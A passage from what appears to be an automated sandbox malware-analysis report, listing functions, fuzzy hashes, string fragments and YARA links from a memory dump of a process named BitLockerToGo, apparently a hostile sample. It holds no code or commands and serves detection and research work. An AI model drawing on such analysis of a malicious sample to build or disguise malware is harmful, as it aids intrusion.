                  • Opcode ID: 403ce0395a76e7367b39ef8631922569626e7315a7180f21363b661612f16460
                  • Instruction ID: 2a25a6b21c24641adecc788ac47e680a191516e763d9bba2631a51519f1e3b25
                  • Opcode Fuzzy Hash: 403ce0395a76e7367b39ef8631922569626e7315a7180f21363b661612f16460
                  • Instruction Fuzzy Hash: A4F05CB56041205BDF2289549CC0F77BBBCCB9B318F19042AF841D3242D1A55C81C3EE
                  Function 0042F6F0 Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                  • Instruction ID: 7cefea67547448f036f9342b1c3dc58d3dbd4ab4406c5377188785d25d336abb
                  • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                  • Instruction Fuzzy Hash: 02D05E21608231469B648E19B400977F7F0EAC7B11BC9957FF982E3248D234DC45C2AD
                  Function 004278BE Relevance: 56.2, APIs: 1, Strings: 31, Instructions: 153memoryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocString
                  • String ID: !$,$,$0$4$5$;$?$?$@$B$C$D$N$P$Q$T$U$U$U$W$Z$Z$c$k$m$q$q$q$y$z
                  • API String ID: 2525500382-1942065873
                  • Opcode ID: c49000a04ca56ad442405149460bf08d053e1707a5348907bf01643a88caa4cf
                  • Instruction ID: 6bb2ca2774bd0411940d1e3bcc535379dbbb046d1cdd20e611ff616d2b2cfe96
                  • Opcode Fuzzy Hash: c49000a04ca56ad442405149460bf08d053e1707a5348907bf01643a88caa4cf
                  • Instruction Fuzzy Hash: 1E91906010DBC18AD332CA7C845879FBFD06BA2324F584A9DE5E94B3E2C7B58545CB63
                  Function 0042875B Relevance: 52.7, APIs: 1, Strings: 29, Instructions: 183memoryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocString
                  • String ID: !$"$#$$$&$'$'$0$2$5$9$:$=$=$?$H$L$W$b$g$h$k$p$s$s$v$w$}$~
                  • API String ID: 2525500382-1893985688
                  • Opcode ID: 14c122fc901c34a21d73ffa74760fd572b8283b99aa1b43a9cd4c2a36ee70cbd
                  • Instruction ID: 3373eeeabd91fb8904c521205920389122d08edecb3bb9cac48b92f656e59ebb
                  • Opcode Fuzzy Hash: 14c122fc901c34a21d73ffa74760fd572b8283b99aa1b43a9cd4c2a36ee70cbd
                  • Instruction Fuzzy Hash: DBA1D42050D7C1CED332CB389848B9FBED16BA2228F584B9EE0E94B2D2D7754505CB67
                  Function 004272E8 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 88COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Variant$ClearInit
                  • String ID: )$+$-$/$1$3$5$7$9$;$=$?$`$a$b
                  • API String ID: 2610073882-4233467066
                  • Opcode ID: b69347533f68b0a7281dfb9018078615f3d804aee30abe8e1a4a4582a76f081e
                  • Instruction ID: 809e1a082863b600d147a6414701c789f9edf009b5c8a2eb9852633494e42d64
                  • Opcode Fuzzy Hash: b69347533f68b0a7281dfb9018078615f3d804aee30abe8e1a4a4582a76f081e
                  • Instruction Fuzzy Hash: 7251E66010D7C1CEE332DB289858B9BBFE16BA6318F080E9EE4D847392C7754549CB63
                  Function 00426E11 Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 84COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Variant$ClearInit
                  • String ID: $"$+$/$7$7$=$W$Y$]$^$v$x
                  • API String ID: 2610073882-1680263821
                  • Opcode ID: 58fac59a84551f4a0fcbac5f9d4d362efbf5d85bc99fe5433d820d4f2f7e8d2b
                  • Instruction ID: 64ed85b497c2894915e72fc45168ad17f1a4635b422f1d27e62d2669671b85ab
                  • Opcode Fuzzy Hash: 58fac59a84551f4a0fcbac5f9d4d362efbf5d85bc99fe5433d820d4f2f7e8d2b
                  • Instruction Fuzzy Hash: 1241C27010C7C28AD331DB28D548B9EBFE0ABA6214F444EAEE1E957392D7754405DB53
                  Function 00426C29 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 80COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Variant$ClearInit
                  • String ID: !$#$%$'$)$+$-$/$1$3
                  • API String ID: 2610073882-2331977360
                  • Opcode ID: 31985bf69454a919f8789bf80cda133a29b871def7f52ed1a404ac1cfe5223c8
                  • Instruction ID: 2c86265527fdeefd615762dda1e56b509df51bc51aa6c90951ef11d86be85e82
                  • Opcode Fuzzy Hash: 31985bf69454a919f8789bf80cda133a29b871def7f52ed1a404ac1cfe5223c8
                  • Instruction Fuzzy Hash: E441B27460C3C18ED331DB38945879BBFE0ABA6324F084A9DE4D947392C7758549CB63
                  Function 00428E3F Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 91COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitVariant
                  • String ID: %$-$3$9$:$<$?
                  • API String ID: 1927566239-3570679970
                  • Opcode ID: 7cf373ec4bb62771d9b5ae9d3e6522a7a873cd9eb955ebd70dd61cbf3c5d22b5
                  • Instruction ID: 3bbfee0d8fb2e518bc1c226d042dcd68f3a753333bfcf61593f2c93f5fd7435d
                  • Opcode Fuzzy Hash: 7cf373ec4bb62771d9b5ae9d3e6522a7a873cd9eb955ebd70dd61cbf3c5d22b5
                  • Instruction Fuzzy Hash: 3551067050D7C58ED336CB2884597DABFE0ABA6314F080E5DE1E84B392C7B44645CBA7
                  Function 004285A9 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Variant$ClearInit
                  • String ID: !$!$0$;$;$<
                  • API String ID: 2610073882-3117644993
                  • Opcode ID: f5d8b091c7beaedc977ad17e0406165a349cd2f1674e168487caca2ef0ef0b08
                  • Instruction ID: 94bfda3bfbb90772080f0e38d4382805a56d3aabf082e36db6c745d864c7441f
                  • Opcode Fuzzy Hash: f5d8b091c7beaedc977ad17e0406165a349cd2f1674e168487caca2ef0ef0b08
                  • Instruction Fuzzy Hash: A221756040C7C18DD3229ABC944864EFFE15BA7324F080E9DE5E44A2E6C6A68546D767